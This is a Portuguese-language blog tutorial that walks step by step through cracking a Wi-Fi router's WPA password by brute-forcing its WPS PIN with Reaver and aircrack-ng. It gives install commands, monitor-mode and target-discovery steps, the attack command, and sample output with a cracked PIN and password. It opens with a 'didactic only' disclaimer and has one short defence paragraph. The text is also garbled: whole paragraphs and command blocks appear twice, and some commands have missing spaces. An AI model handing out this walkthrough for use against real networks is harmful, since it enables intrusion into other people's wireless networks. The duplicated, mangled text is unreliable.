Reaver - Descobrindo senhas Wi-Fi
Este artigo tem o objetivo de demonstrar, passo a passo, como
descobrir senhas Wi-Fi utilizando o Reaver, explorando uma
vulnerabilidade do protocolo WPS.
[ Hits: 167.684 ]
Por: Clayton Visotto em 30/07/2014
Sobre o Reaver
Considerações iniciais
A finalidade deste artigo, é apenas didática. Como todos aqui sabem,
invasão é crime e o autor pode responder e pegar até 1 ano de prisão
(mais detalhes aqui).
Todos os testes foram feitos em minha rede particular. Não me responsabilizo pelo mau uso do mesmo.
Utilizei o Ubuntu 13.10.
Todos os testes foram feitos em minha rede particular. Não me responsabilizo pelo mau uso do mesmo.
Utilizei o Ubuntu 13.10.
O que é Reaver?
Reaver é uma ferramenta que pode ser utilizada para explorar uma
vulnerabilidade do protocolo WPS, utilizado pelas chaves do tipo WPA e WPA2, a fim de resgatar a senha configurada no aparelho roteador.
Ele realiza um ataque de brute force sobre o código PIN do roteador que é composto por 8 caracteres numéricos, onde o último é apenas um dígito de validação composto pela soma dos primeiros.
O PIN code é uma identificação numérica do router. Informando esse código corretamente para o roteador, ele informa qual a senha e SSID configurados no equipamento, ou seja, o ataque consiste em capturarmos o PIN code para depois obtermos a senha, independente de sua complexidade.
A falha no protocolo WPS e a consequente redução de possibilidades numéricas, torna possível recuperar a senha entre 4 e 10 horas, após um certo número de combinações do código PIN.
Se o ataque de força bruta fosse aplicado diretamente sobre a senha, dependendo de sua complexidade, poderia demorar semanas, até que a senha fosse quebrada, isso se ela existir em seu dicionário. Neste caso, como o ataque é feito no PIN code, a complexidade da senha não interfere no tempo de resposta do resultado final.
vulnerabilidade do protocolo WPS, utilizado pelas chaves do tipo WPA e WPA2, a fim de resgatar a senha configurada no aparelho roteador.
Ele realiza um ataque de brute force sobre o código PIN do roteador que é composto por 8 caracteres numéricos, onde o último é apenas um dígito de validação composto pela soma dos primeiros.
O PIN code é uma identificação numérica do router. Informando esse código corretamente para o roteador, ele informa qual a senha e SSID configurados no equipamento, ou seja, o ataque consiste em capturarmos o PIN code para depois obtermos a senha, independente de sua complexidade.
A falha no protocolo WPS e a consequente redução de possibilidades numéricas, torna possível recuperar a senha entre 4 e 10 horas, após um certo número de combinações do código PIN.
Se o ataque de força bruta fosse aplicado diretamente sobre a senha, dependendo de sua complexidade, poderia demorar semanas, até que a senha fosse quebrada, isso se ela existir em seu dicionário. Neste caso, como o ataque é feito no PIN code, a complexidade da senha não interfere no tempo de resposta do resultado final.
Método de defesa
A melhor contramedida que pode ser adotada para evitar este tipo de
ataque, é desabilitar o protocolo WPS ou utilizar firmwares atualizados
que limitem as mensagens trocadas entre o AP e os destinatários,
bloqueando a troca de pacotes após um certo número de tentativas.
Instalação
Instalando libs:
sudo apt-get update
sudo apt-get install build-essential
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev libpcap0.8 libsqlite3-0
sudo apt-get install libssl-dev# Usado pelo Aircrack-ng
Instalando Aircrack-ng:
O Aircrack-ng será utilizado para manipular a placa de rede Wi-Fi e identificar o BSSID alvo.
sudo apt-get install aircrack-ng
Caso não exista no repositório, será necessário seguir os seguintes passos:
wgethttp://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
Edite o arquivo common.mak:
vi aircrack-ng-1.1/common.mak
Ache a linha abaixo:
Remova -Werror, conforme abaixo:
sudo apt-get update
sudo apt-get install build-essential
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev libpcap0.8 libsqlite3-0
sudo apt-get install libssl-dev# Usado pelo Aircrack-ng
Instalando Aircrack-ng:
O Aircrack-ng será utilizado para manipular a placa de rede Wi-Fi e identificar o BSSID alvo.
sudo apt-get install aircrack-ng
Caso não exista no repositório, será necessário seguir os seguintes passos:
wgethttp://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
Edite o arquivo common.mak:
vi aircrack-ng-1.1/common.mak
Ache a linha abaixo:
CFLAGS ?= -g -W -Wall -Werror -O3
Remova -Werror, conforme abaixo:
CFLAGS ?= -g -W -Wall -O3
Salve o arquivo, monte o pacote e instale:
make
sudo make install
Instalando o Reaver
sudo apt-get install reaver
Caso não exista no repositório, será necessário seguir os seguintes passos:
wgethttp://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar -xzvf reaver-1.4.tar.gz
cd reaver-1.4
cd src
./configure
make
sudo make install
Para conferir se foi instalado:
which reaver
O resultado será:
/usr/local/bin/reaver
Tudo pronto para iniciar o ataque.
Caso não exista no repositório, será necessário seguir os seguintes passos:
wgethttp://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar -xzvf reaver-1.4.tar.gz
cd reaver-1.4
cd src
./configure
make
sudo make install
Para conferir se foi instalado:
which reaver
O resultado será:
/usr/local/bin/reaver
Tudo pronto para iniciar o ataque.
Ataque
Preparando o ataque:
- Colocar a placa de rede Wi-Fi em modo monitor com o Aircrack-ng.
- Identificar o alvo (capturar o BSSID do router alvo, utilizando também o Aircrack-ng).
- Atacar (Reaver).
Para isso, seguir os passos abaixo:
Encontre o sua interface Wi-Fi:
iwconfig
Você verá o nome da interface de rede sem fio, por exemplo wlan0.
Coloque sua placa Wireless em modo monitor:
sudo airmon-ng start wlan0
Monitor mode enabled on → que muito provavelmente será mon0.
Encontre o BSSID do roteador que você quer crackear:
sudo airodump-ng mon0
BSSID é o MAC address do roteador.
A rede deve ter WPA ou WPA2 listado na coluna ENC.
Ataque:
sudo reaver -i mon0 -b 00:00:00:00:00:00 -vv
Onde:
- -i :: interface
- -b :: BSSID (substituir o "00:00:00:00:00:00" pelo alvo)
- -vv :: verbose (mostrar mensagens)
Deixe disparando e aguarde o resultado que será semelhante ao da imagem:
No meu caso, a senha foi quebrada em apenas 2 horas:
Pin cracked in 7302 seconds
WPS PIN: '10179178' (pin code do roteador)
WPA PSK: '79ri7gse6.c' (senha revelada!)
AP SSID: GENTIL
Conclusão
Como vimos, o Reaver é capaz de quebrar a senha em pouquíssimo tempo, comparado a outras técnicas de brute force que utilizam dicionário de palavras.
Espero que tenha contribuído com o aprendizado dos leitores, lembrando que não devem fazer mau uso deste recurso.
Obrigado.
Referência: Reaver - Testes de segurança em redes sem fio [Artigo]
Espero que tenha contribuído com o aprendizado dos leitores, lembrando que não devem fazer mau uso deste recurso.
Obrigado.
Referência: Reaver - Testes de segurança em redes sem fio [Artigo]
Nenhum comentário:
Postar um comentário